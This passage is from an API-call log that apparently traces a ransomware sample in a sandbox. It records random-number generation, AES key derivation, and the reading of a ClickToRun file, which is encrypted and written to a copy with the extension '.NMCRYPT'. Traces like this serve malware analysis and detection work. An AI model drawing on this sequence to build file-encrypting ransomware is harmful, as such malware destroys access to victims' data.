dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.448] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.451] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.451] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.451] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d064 | out: phHash=0x60d064) returned 1 [0143.451] CryptHashData (hHash=0x8be1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.451] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x8be1f8, dwFlags=0x4, phKey=0x60d068 | out: phKey=0x60d068*=0x8bdf78) returned 1 [0143.451] CryptSetKeyParam (hKey=0x8bdf78, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0143.451] CryptSetKeyParam (hKey=0x8bdf78, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0143.451] wcslen (_String="\\\\?\\") returned 0x4 [0143.452] CryptDuplicateKey (in: hKey=0x8bdf78, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x8be0f8) returned 1 [0143.452] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0143.452] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0143.452] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=102) returned 1 [0143.452] WriteFile (in: hFile=0x588, lpBuffer=0x28d3e40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d3e40*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0143.453] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x66, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x66, lpOverlapped=0x0) returned 1 [0143.453] CryptEncrypt (in: hKey=0x8be0f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x66, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0143.453] GetLastError () returned 0x0 [0143.453] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0143.454] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0143.454] WriteFile (in: hFile=0x588, lpBuffer=0x607978*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 